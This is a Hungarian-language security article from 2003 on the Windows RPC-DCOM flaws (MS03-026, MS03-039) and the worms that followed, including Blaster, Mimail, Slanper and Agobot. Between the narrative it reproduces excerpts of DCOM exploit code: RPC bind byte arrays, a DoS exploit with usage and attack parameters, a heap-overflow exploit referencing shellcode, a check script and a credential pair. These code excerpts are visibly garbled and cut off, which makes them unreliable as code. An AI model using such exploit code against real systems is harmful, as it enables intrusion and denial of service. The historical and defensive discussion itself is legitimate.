„2003, Szeptember 8: Feltettem, javítást és utána reboot, majd csináltam két k-otik tesztet :
http://www.k-otik.com/MS03-032-TEST/
http://www.k-otik.com/MS03-032-TEST2/ sebezhető a rendszerem !!!" (idézet egy levélből)
Talán ezekkel a szavakkal kezdődött el a Microsoft RPC-DCOM új
hibájának új fejezete.
Lépjünk vissza egy kicsit a „történelemben": Augusztusban történt, amikor észlelték a Windows RPC – DCOM modul hibát. Tudtak róla, elkészült egy javítás is júliusban, de a felhasználók figyelmen kívül hagyták. A hiba lényege a következő volt: A Távoli eljáráshívás (RPC) egy a Windows operációs rendszer által használt protokoll. Az RPC olyan, folyamatok közötti kommunikációs mechanizmust biztosít, amely lehetővé teszi, hogy a programok zökkenőmentesen kódot futtathassanak egy távoli számítógépen. Maga a protokoll a Nyitott Szoftver Alapítvány (Open Software Foundation, OSF) RPC protokolljából származik. A Windows által használt RPC protokoll Microsoft-specifikus bővítményeket is tartalmaz. Az RPC protokollnak a TCP/IP protokollon keresztüli üzenetváltást kezelő részében biztonsági rés található. A hiba a helytelenül formázott üzenetek nem megfelelő kezeléséből ered. Ez a biztonsági rés az elosztott komponensobjektum-modell (Distributed Component Object Model, DCOM) és az RPC közötti illesztő felületet érinti, amely a 135-ös TCP/IP portot figyeli. A felület az ügyfélszámítógépek által a kiszolgálónak küldött DCOM-objektum aktiválási kéréseket kezeli (például univerzális elnevezési konvenció [UNC] szerinti elérési utak). A hiba kihasználásához a támadónak speciálisan formázott kérést kell küldenie a távoli számítógépnek a 135-ös porton. A biztonsági rés kiaknázásához a támadónak képesnek kell lennie speciálisan kialakított kérést küldeni a távoli számítógép 135-ös portjára.
Ezután "kissé" felgyorsultak az események. Új vírust regisztráltak:
A vírus neve : Troj/Autoroot-AMás elnevezései: Troj/IRCBot-G, Troj/ExplDCOM-A and Troj/ExplDCOM-B
A vírus típusa : Trójai program
Dátum : 2003. augusztus 5.
A fertőzéskor a regisztrációs adatbázisba történő bejegyzésen túl megnyitja a 8719-es portot és távoli parancsokra várakozik. Megkísérli kihasználni az ismert Microsoft DCOM RPC interface hibáját és így utat nyitni a fenti porton - a Troj/IRCBot-G féregnek, hogy átvehesse az irányítást a megtámadott számítógép felett A Microsoft által kibocsátott patch (akkor azt hittük) megszünteti ezt a sebezhetőséget. A patch elérhető a Microsoft Bulletin weboldalán. Miután az exploitokat, a kártékony futtatható kódokat ismerem, megszereztem a féreg kódját. Erre mondják teljes joggal, hogy "míves munka". Bár a megírását ártó szándék vezette, de mint munkának az elismerés jár. Három állományból van, mindhárom egy fájlba csomagolt. (scan, serv, vdcom) Feljutva a gépre mikor a kód megkezdi futását végrehajtja a fent jelzett folyamatokat. Miért mert a féreg az exploitok tökéletesített, és egyéb funkciókkal ellátott fejlesztése nem zárom ki, hogy írójuknak köze van egymáshoz.
(A kód – és az írásban máshol is szereplő kódok kimásolása tilos, szerzői jogvédelem alatt állnak. Ha valaki mégis megteszi, más gép ellen nem használhatja, kimásolva a vizsgálatból eredő kárért felelősség csak őt terheli.)
RPC DCOM WORM v 2.2- részlet
3.Egy kísérleti (exploit) kód - példa:
#include
#include
#include
#include
#include
#include
unsigned char bindstr[|]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[|]={
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
vois main((int argc,char ** argv/%\);
{;
WSADATA | WSAData;**
int i;
SOCKET sock=(,0) | set=i
SOCKADDR_IN addr_in;
if send(sock,printf"/sizeonn=(1-1000);\n-d"));
}
if (send(sock,bindst,sizeof ==(0)==(bindtr)),0)==SOCKET_ERROR);
{;
printf("Send failed.Error:%d/%\n=d",WSAGetLastError());
return;
}
i=rec%(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request)"(0')=SOCKET_ERROR)buf=i
{;
printf("Send failed.Error:\b"%d\n",WSAGetLastError());
back;
};
i=recv(sock,buf1,1024,MSG_PEEK);
A vírus neve: W32/Mimail-A
A vírus típusa: Win32-es féreg
Dátum: 2003. augusztus 1.
Mimail féreg eddig alig látott terjedést mutat. A szaklapok azt írták megjelenésekor, hogy ilyen gyors terjedésű féreggel nem találkoztak- nem gondolva arra, hogy ez napok múlva megdöntött rekord lesz. A legújabb Vírus Bulletinben olvasható Szappanos Gábor, a VirusBuster szakértőjének kiváló elemzése, analízise erről a féregről.
A vírus neve : W32/Blaster-A
Más név:W32/Lovsan.worm, W32.Blaster.Worm,
WORM_MSBLAST.A, Win32.Poza, Worm/Lovsan.A
A vírus típusa : Win32 féreg
Dátum: 2003. augusztus 12.
W32/Blaster-A féreg átvizsgálja a hálózatot és olyan számítógépeket keres, amelyeken kihasználhatja a Microsoft DCOM RPC biztonsági hibát. Amennyiben alkalmas számítógépet talál ,a féreg rámásolja magát a megtámadott számítógépre TFTP csatornán keresztül. Írója ismeretlen.
A vírus neve: W32/Blaster-B
Más név:
W32/Lovsan.worm, W32.Blaster.Worm, WORM_MSBLAST.A, Win32.Poza, Worm/Lovsan.A
A vírus típusa: W32 féreg
Dátum: 2003. augusztus 13.
W32/Blaster-B működési mechanizmusában megegyezik a W32/Blaster-A -val. A különbség az, hogy ez a vírus más fájlt (teekids.exe) és más registry bejegyzést használ. A W32/Blaster-A féreg (más neveken: Lovsan, MSBlaster vagy Poza) tartalmaz egy gúnyolódó üzenetet Microsoft elnökéről Bill Gates-ről, és megkísérel egy adatelárasztásos (DoS) támadást indítani egy Microsoft honlapot célba véve, azt a lapot, ahonnan a cég a frissítéseit, javítóit lehet letölteni. Ez igen éles, és előrelátó gondolkodásra vall. Megakadályozza, hogy a hibajavítót letöltsék, akik eddig nem tették. Vagyis biztosítja magának a védetlen szervereket. Írója ellen eljárás folyik.
Miért volt ez a „nagy bonyodalom": A rossz csomagkezelésből adódóan ha egy rendszert egy kis hiba megingat, és ettől összeomlik, akkor ezek után a támadó könnyedén átveszi az összeomlott szolgáltatás jogait. Az rpc pedig system jogokkal fut, tehát az admin szint felett. "Kis hiba" mondanák sokan, de egy biztos, hogy a rendszerükön nem Windows 2000 említett verziói futnak. Szokatlannak tűnhet, hogy egy olyan kódot, mely előidézheti azt a hibát, amiről az írás szól, egy portál közöl is. Ha belegondolnak – azért szokatlan, mert ezeket nem közölték, bár ismertek voltak más esetekben is. Úgy érezzük, hogy a felhasználónak teljes joga látni ezeket a kódsorokat, melyek rendszere sérülékenységét okozzák. Talán így jobban megérti a Tisztelt olvasó, hogy miért fordítunk olyan jelentőséget a biztonságra, védelemre. Nem oktató céllal, hanem példa miatt tesszük – megkérve mindenkit arra, hogy elégedjen meg tanulmányozásával, ne használja azt saját rendszerén sem – különösen más rendszeren.
"Blaster támadása, a Microsoft windowsupdate.com weboldalt elvileg el tudja zárni az internettől." Mondta Graham Cluley a Sophos szakértőinek megbecsült tagja. "Lehetőség van arra, hogy a fertőzött gépekről egy összpontosított adatelárasztásos (DoS) indítson. A vírus írója, tehát szándékosan megpróbálja megakadályozni, hogy további frissítéseket töltsenek le a felhasználók - el kell ismerni, hogy a féreg írójának ez egy meglepő trükkje"
A Forrester Research alelnökével, egyben Giga Information Group aktív tagjával Steve Hunt-tal volt egy érdekes levélváltásunk kutatási területével, az IT biztonság alakulásával kapcsolatban. Nagyon sok olyan dolgot írt le, ami teljesen kézenfekvő, de sokan nem gondolnak rá. Jelenleg azzal foglalkozik, hogy hosszmetszetében az IT biztonság helyzete hogy alakult 2000-től. (Erről a témáról a napokban egy cikk is megjelent a CNET News lapjain.) A levelek összefoglalójának publikálásába beleegyezett – amit csak megtiszteltetésnek lehet venni.„Te is ismered ezt a dátumot: 2001. 09 . 11. Ezután a helyzet rosszabb lett. Ekkor nem csak az ár, befektetés – előny analízist követelték meg, hanem az "üzleti határidőket" is minimálisra csökkentették - a szeptember 11-i robbanás után napvilágra került, és megismert hiányok miatt – arra gondolva, hogy ez javít a biztonságon.
Szerencsére engem nem érintett, de sajnos „kapkodás lett belőle", nem alapos munka. A szakemberek több oldalról szorongatott helyzetbe kerültek – ha nem ez a „gárda lett volna", még jósolni sem merném a következményeket. Egyre nagyobb súly nehezedett a szakemberek vállára, és ebben a helyzetben kellett kezelni a rendszerbiztonságot, és annak javításait. Ma, az IT a biztonság egyértelműen piac, és annak egyik szenvedő alanya lett - hisz sem az eladók, sem a vevők nincsenek tisztában egy áru értékével, annak biztonságával. Nincsenek tisztában azzal sem, hogy pl. egy tűzfal biztonsági mércéje hogy néz ki, hova tehető, - így az sem válik tudottá az üzletben, hogy hol van az a "vonal", ami a minimális biztonsági szintet jelenti. "
Egy kis szünet következett az események sorában, amikor inkább a Sobig féregcsalád vette át az uralmat a „wild"-ben, tehát ez az időszak sem volt eseménymentes:
Kéretlen reklámlevélben terjedő vírusokra figyelmeztet a Tif csoport. A 130 legnagyobb brit intézmény informatikai felső vezetőit tömörítő fórum szerint egy új módszer könnyíti meg a kártevők bejutását Windows alapú gépekbe. A kéretlen levelek (ún. SPAM) terjesztői egy ideje már rákaptak a vírusok kihasználására, mert ezzel a módszerrel a távolról ellenőrzésük alá vont fertőzött gépekről több millió címzettnek küldhettek spam levelet. Most ennek folyamatnak a fordítottja zajlik, "igazi" vírusírók használják a spammerek által kikísérletezett taktikát és levélformulát saját, kártékony termékeik terjesztésére. (A fordító megjegyzése: Csaknem minden spam levél tartalmaz hyper-linket; többnyire képeknek az üzenet részeként történő megjelenítésre, vagy a levélben található rövid "beetető" szöveg folytatására mutató webhivatkozásként használják ezeket.) Az eredeti cikk forrása a news.bbc.co.uk, a fordításé a virushirado.hu – köszönjük.
„A vírusírók az esetek nagy részében akkor „alkotnak" igazán „komoly dolgot", ha ismertté válik egy rendszerhiba, egy sérülékenység, biztonsági rés. A kórokozók ezt használják ki különböző formában. A rendszerírók előtte, vagy ekkor „megírják javításaikkal, amikkel a réseket be lehet foltozni"
W32/Slanper-A
Más név: W32/Slanper.féreg, Win32/HLLW.Rejase.A
Fajta: Win32 féreg
W32/Slanper-A egy véletlenszerűen generált listát, melyek IP listának felelnek meg. A saját maga által generált lista létező IP-it megpróbálja összekötni, és a 445-ös porton keresztül ily módon terjedni. A sok más féregtől eltérően viselkedő W32/Slanper-A féreg analizálásakor feltűnt, hogy van egy hátsóajtó (backdoor) függvény is benne. Miért írtam, hogy érdekes, szokatlan: a féregnek van egy másodlagos összetevője, ami kiszabadulva önálló fertőzésre képes féreg fajta lesz. Ez az összetevő payload.dat fájlnéven található abban a mappában, ahol a féreg is. A payload.dat kódja aktiválódik, és futni kezd, a regisztrációs adatbázist módosítja,ami biztosítja azt a lehetőséget, hogy amennyiben sikerült, a 445-ös port megszerzése után, azt használva, fenntartsa e kapcsolatát, úgy hogy a féreg mindezek hátterében fut.
A Windows RPC-DCOM csomagkezelési hiba észlelése után egy idővel, kihasználva azt megjelent először a Troj/Autoroot-A, közben észlelték az Internet Explorer, és az Outlook Express hibái leírásuk a Windows tudásbázis MS01-015, MS02-014, MS02-15 - ben található, ill a javító patch az MS03-14 - mellékleteként. A hibát használta ki a Mimail, amiről a szeptemberi Vírus Bulletin lapjain Szappanos Gábor a VírusBuster munkatársa írt szenzációs elemzést. Majd "jött a Blaster-A", ill a Lovesan. Ez kellett ahhoz, hogy a meglévő foltot mindenki feltegye a rendszerére. De ennek elmaradása - a felhasználói felelőtlenség miatt hatalmas endémiákat okozott. Bár, aki felrakta a javításokat (úgy vélte), megnyugodhat. Áprilisban a böngésző, és a levelező két Cumulative Patch, ill. júliusban az PRC-DCOM Cumulative Patch -revizió augusztusban).
Tehát nyugodtak lehettünk egy ideig, míg ki nem derült, hogy ismétlődik a történelem : hiba van a Windows rendszerekben "a biztonsági réseket az RPCSS Service-ban fedezték fel (az úgynevezett Distributed Component Object Model (DCOM) felületében); egy rosszul definiált üzenet nem megfelelő kezeléséből származnak. A három új sérülékenységből kettő lehetővé teszi, hogy a támadó kódot futtathasson a nyitott rendszeren, a harmadik pedig DoS-támadásra használható fel. Kiaknázásukkal a behatoló bármit megtehet (helyi rendszerprivilégiummal): programot telepíthet, ellenőrizhet, adatokat nézhet/változtathat meg vagy törölhet le, és akár új accountokat is létrehozhat a rendszerben." (terminal.hu).
„Hát igen - kilyukadt a folt... Nem baj, foltozzuk meg - sürgős javítás, újabb javítás, és annyi folt került a Windows csomagkezelő alkalmazására, hogy "már nem is látszik". Vagy mégis - a Blaster-től egy valamit megtanulhattunk: DCOM összetevő az alábbi portokon támadható: TCP/IP port 69/UDP, 135/TCP, 135/UDP, 139/TCP, 139/UDP, 445/TCP, 445/UDP, 593/TCP, 1086/TCP, 4444/TCP. Melyik portot "nézte ki" magának a 445-ös portot? Az eddig ismertek szerint az PRC -DCOM protokoll esetében Intranetes környezetben a kommunikáció a 135-ös porton történik: "Ha az RPC protokollnak a TCP/IP protokollon keresztüli üzenetváltást kezelő részében biztonsági rés található - kimondható, hogy a hiba a helytelenül formázott üzenetek nem megfelelő kezeléséből ered. Ez a bizonyos biztonsági rés az elosztott komponensobjektum-modell (Distributed Component Object Model, DCOM) és az RPC közötti illesztő felületet érinti, amely a 135-ös TCP/IP portot figyeli. A felület az ügyfélszámítógépek által a kiszolgálónak küldött DCOM-objektum aktiválási kéréseket kezeli (például univerzális elnevezési konvenció [UNC] szerinti elérési utak). A hiba kihasználásához a támadónak speciálisan formázott kérést kell küldenie a távoli számítógépnek a 135-ös porton. Intranetes környezetben ez a port általában elérhető, az internethez csatlakozó számítógépeknél azonban a 135-ös portot rendszerint blokkolja a tűzfal." - írtam néhány napja.
A hivatalos közlemény szerint:
A felhasználók nézzék meg a http://www.microsoft.com/protect lapot.
IT szakembereknek a következőt ajánljuk:http://www.microsoft.com/technet/security/tips/pcprotec.asp
Érintett rendszerek:
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT ServerŽ 4.0
Microsoft Windows NT Server 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Kivétel:
Microsoft Windows Millennium Edition
A Microsoft Security Bulletin MS03-026 folt feltelepítése ellenére három súlyos hibát fedeztünk fel.
Remote Procedure Call (RPC) A Windows operációs rendszer egyik protokollja. Az RPC protokoll TCP/IP szabványon „felügyeli" a gép folyamatait, ill. Az üzenetváltást. Az RPC az Open Software Foundation (OSF) – rendszeréből származik. A biztonsági rés ismét az RPC - TCP/IP protokollon keresztüli üzenetváltást kezelő részében található.
Az illesztőfelület az elosztott komponensobjektum-modell (Distributed Component Object Model, DCOM) és az RPC között a 135 – ös porton van. A DOCM az aktiválási kéréseket kezeli. Az RPSS service akkor válhat sérülékennyé, ha a DCOM objektumot egy hosszú, speciális üzenet aktiválja. Ekkor az objektum üzenetkezelése zavart szenved, miáltal az egész rendszer a résen keresztül sebezhetővé válik. Ez különböző módon nyilvánulhat meg: két módon adat túlcsordulás (puffer overrun) alakulhat ki, míg egy exploit esetén a rendszer alkalmassá válik DdoS támadás indítására. (az adattúlcsordulást Eric Hines, CEO, Chairman, Applied Watch Technologies, Inc. Bizonyította)
Az RPCSS service hiba a most kiadott Buffer Overrun In RPCSS Service Could Allow Code Execution (824146) folt telepítésével javítható Minderről a MS Tudásbázis 827363 és 826369 fejezetében olvashatnak.
Tulajdonképpen mi „a RPCSS sevice gond"?
A hiba tehát az RPC szolgáltatás esetében akkor lép fel, ha a DCOM protokoll aktiválódik. Hosszú, vagy speciális üzenet miatt alakul ki a hiba, mely miatt az előbb felsoroltak bekövetkezhetnek. A gond talán az volt, hogy az RPCSS – DOCM aktiválódásakor kinyílnak az UDP 135, 137, 138, 445 port és TCP 135, 139, 445, 593 – as port, ezen kívül a 80 és a 443 port, ha a COM Internet Services (CIS) vagy az RCP – HTTP kapcsolat aktiválódik. Tehát a 445 TCP, UDP port (RPC-HTTP esetén a 80. 443.port) is hasonlóan sérülékeny pontja a protokollnak. „Az „ismételt" hiba felfedezésekor néhány igen komoly szaktekintély részben magánlevélben, részben nyilatkozatban felvetette, hogy az előzőhöz, a Blaster-hez hasonlóan, itt is a hiba felfedése után kb. 2 héttel vérhatóak a "komolyabb, intelligensebb" vírusok, várható egy hibán alapuló vírusinvázió.
Előfordulhat, hogy a W32/Slanper-A a várható invázió előfutára lenne?" - az idézett írásom óta százait elolvasva alakult ki a következő kép:
A hiba először szeptember 08.-án jelzik egy levelezőlistán, hogy a Windows csomagkezelésében hiba van, de ez nem azonos az augusztusban napvilágra kerülttel. Az akkori exploittal tesztelve megállapítható, hogy az exploit csak az RPC-DCOM folyamatot állítja meg, a gép sértetlen marad. Mindezt Kínában jegyzik meg.
Másnak is feltűnik, hogy a javítócsomag telepítése után hasonló jelenséget tapasztalnak, mint augusztusban – a netfilter hasonló SYN-eket jelez.
A Microsoft a hibát szeptember 10-én teszi közzé, javítócsomaggal, de akkor már készen van az első olyan exploit, ami „hatékonyabb", de nem tökéletes. Az architektúrája hasonlít az előzőekhez.
# The script code starts here
#
function dcom_recv(socket)
{
#--------------------------------------------------------------#
function check(req)
{
local_var soc, bindstr, error__code, r;
soc = op_sock_tc(port);
if(so)exi;
bindstr =
"05000b03100000004800000001000000d016d0160000000
r = dcom_rect:soc);
(!r)exit(0);
send(soc, data:req);
r = dcom_recv(sooc);
p(port);
if(!so)exit(0);
send(socket:soc, data:heaw(s:bindwinme));
rwinme = dcom_recv(sockt:soc);
cle(soc);
lenwie = strlen(rnme);
stubwinme = substr(rwme, lenwme-24, lenme-21);
# This is Windows 95/98/ME which is not vulnerable
if("02000100" >< hexstr(stubwinme))exit(0);
#----------------------------------------------------------------#
REGDB_CLASS_NOTREG = "5401048000";
CO_E_BADPAT = "0408444882220002288000";
NT_QUTE_EROR_CODE_EQUOTE = "00000000";
error1 = check(req:heraw(s:req1));
error2 = check(req:hexaw(s:req));
#error3 = check(req:hexaw(s:req3));
#error4 = check2(req:hexaw(s:req4));
if(hexstr(error1) == "05078000")exit(0); # DCOM disabled
security_hole(port);
}
else {
set_kb_item(name:"SMB/KB824146", value:TRUE);
}
Azonnal visszajelzés érkezett, hogy "x" user, és password of "asd$bdd1" használata esetén csak az angol nyelvű Win2000 SP3-SP4 esetén „hatásos".
A hibát sokkal veszélyesebbnek ítélik meg, mint augusztusban, a rendszer vizsgálatára megjelentek a segédeszközök a http://grc.com/dcom/ lapon.
"Egyszerűen nem találok mentséget, hogy nem tudnak a hibára egy hatékony javítást kiadni" mondta Graham Cluley, Sophos Anti-Vírus. "Az „újjáéledt" Blaster és Nachi férgek e miatt már most is jelentős károkat okoztak. Sokkal komolyabban kell figyelni minden szinten (gyártó – felhasználó) a rendszerbiztonságra."
Ez a megjegyzés azért is bír nagy jelentőséggel, mert a hiba észlelésekor (mellette az IE, és az Outlook hibák felfedésekor) a Microsoft először a „régi, elégtelennek tűnt javítócsomagot ajánlotta
° V1.0 (August 20, 2003): Bulletin Created.
° V1.1 (August 25, 2003): Added information regarding ASP.NET related issues with Windows XP patch.
° V1.2 (August 28, 2003): Added details to reboot information in Additional Information section.
° V1.3 (September 8, 2003): Added information regarding reports that the patch provided does not properly correct the Object Type Vulnerability (CAN-2002-0532)
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
The patch has *not* been updated. The Microsoft security bulletin was changed to acknowledge that the original patch sucks and doesn't work. (nem újítottak a folton, nem cserélték, ugyanazt javasolják, ami nem működött)
Az MS legutóbbi javító foltjai:(Szeptember, 2003)
MS03-039 : Buffer Overrun In RPCSS Service Could Allow Code Execution (824146)
MS03-038 : Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution (827104)
MS03-037 : Flaw in Visual Basic for Applications Could Allow Arbitrary Code execution (822715)
MS03-036 : Buffer Overrun in WordPerfect Converter Could Allow Code Execution (827103)
MS03-035 : Flaw in Microsoft Word Could Enable Macros to Run Automatically (827653)
MS03-034 : Flaw in NetBIOS Could Lead to Information Disclosure (824105)
August 2003
MS03-033 : Unchecked Buffer in MDAC Function Could Enable System Compromise (823718)
MS03-032 : Cumulative Patch for Internet Explorer (822925)
July 2003
MS03-031 : Cumulative Patch for Microsoft SQL Server (815495)
MS03-030 : Unchecked Buffer in DirectX Could Enable System Compromise (819696)
MS03-029 : Flaw in Windows Function Could Allow Denial of Service (823803)
MS03-028 : Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack (816456)
MS03-027 : Unchecked Buffer in Windows Shell Could Enable System Compromise (821557)
MS03-026 : Buffer Overrun In RPC Interface Could Allow Code Execution (823980)
MS03-025 : Flaw in Windows Message Handling through Utility Manager Could Enable Privilege Elevation (822679)
MS03-024 : Buffer Overrun in Windows Could Lead to Data Corruption (817606)
MS03-023 : Buffer Overrun In HTML Converter Could Allow Code Execution (823559)
June 2003
MS03-022 : Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (822343)
MS03-021 : Flaw In Windows Media Player May Allow Media Library Access (819639)
MS03-020 : Cumulative Patch for Internet Explorer (818529)
Eközben megírják az újabb exploitot (Kína)
Subject: Windows RPC DCOM Dos exploit
/*
* Windows RPC DCOM Dos exploit
* by bkbll bkbll@cnhonker.net
* http://www.cnhonker.com
* modified the code from oc192 Security
*
* Usage:
* cl dcomdos.cpp
* dcomdos -d 10.10.10.135 -n 3000 */
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
#define VER "2.3_beta"
int num=1;
define _next_char(string) (char)(*(string+1))
int getopt(int argc, char * {
if (*(++pIndexPosition))
/* used up all command-line arguments */ }
pArgString = argv[optind++]; /* set this to the next argument ptr */
if (('/' != *pArgString) && ('-' != *pArgString)) {
--optind; /* point to cudone */
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
}
if (':' == *pArgString)
{
return (opterr ? (int)'?' : (int)':');
}
printf(" -p: Attack port [Default: 135]\n");
printf(" -n: offset.\n");
exit(0);
}
void sig(int j)
{
Bizonyítást nyer, hogy a 445 port a „legkapósabb":
„I am receiving some amount of traffic on Port 445. Is this a new worm using the new discovered RPC-DCOM 039 issue or some other rather old stuff?!? Anybody seen this too?"
09:42:21.663609 x.y.21.z.1825 > 142.160.144.11.445: S
821570346:821570346(0) win 65535 (DF)
09:42:21.965317 x.y.21.z.1827 > 142.160.144.12.445: S
821737415:821737415(0) win 65535 (DF)
09:42:22.770055 x.y.21.z.1829 > 142.160.144.13.445: S
822039122:822039122(0) win 65535 (DF)
09:42:23.277790 x.y.21.z.1831 > 142.160.144.14.445: S
822992385:822992385(0) win 65535 (DF)
Végül megjelenik a „végleges" exploit, amit már csaknem vírusnak is nevezhetünk. Ez a váz némi csiszolással kiválóan megfelel annak, hogy bármilyen vírust írjanak a segítségével:
Windows RPC DCOM long filename heap overflow Exploit (MS03-039)
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
nsigned char request2[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00
}, v;
int i, iType;
printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
"Base on flashsky's MS03-026 exp\n"
"Code by ey4s\n"
"2003-09-16\n"
"Welcome ocus.net\n"
"Thanks to flashsky &
if(argc!=3)
{
printf("Usage: e>\n",
for(i = 0; i < sizeof(targets)/sizeof(v); i++)
printf( "<%d> %s\n"
{
printf("[-] Wrong type.\n");
return;
}
printf("[+] Prepare shellcode completed.\n");
printf("[-] Send failed.stError());
return;
}
else
printf("[+] bytes.\n", len);
len=recv(sock,buf1,1000,0);
if(len<=0)
{
else
printf("[-] recv uck!\n", len);
}
E mellett Lengyelországban megírják a Root remote exploitot.
A történet eddig tartana, de „színre lép" először a W32/Slanper-A , majd a W32/Agobot-S ( Alias - Backdoor.Agobot.3.F, W32/Gaobot.worm.ab, W32.HLLW.Gaobot.AE, WORM_AGOBOT.AB ), és a Swen (ALIAS: I-Worm.Swen, W32/Swen.A@mm, W32/Gibe.E@MM, Gibe.E )
Így, hogy a rövidre szánt összefoglaló végére értem, valami nagyon okosat kellene mondanom. Esetleg kitartásra biztatni a felhasználókat, javaslatot, vagy tanácsot adni. - eddig jutottam el a gondolatban, amikor véletlenül ránéztem a levelezőmre. Rengeteg levél – nem spamek, hanem szakemberek, cégek levelei. Mennyi idő, mennyi munka? Előző írásomban ezt meg sem említettem. Csak egy mondat jutott eszembe, mint alapvetően kecskeméti „gyeröknek": „Ami nem mögy, ne' erőtessük!"
Papp Geza dr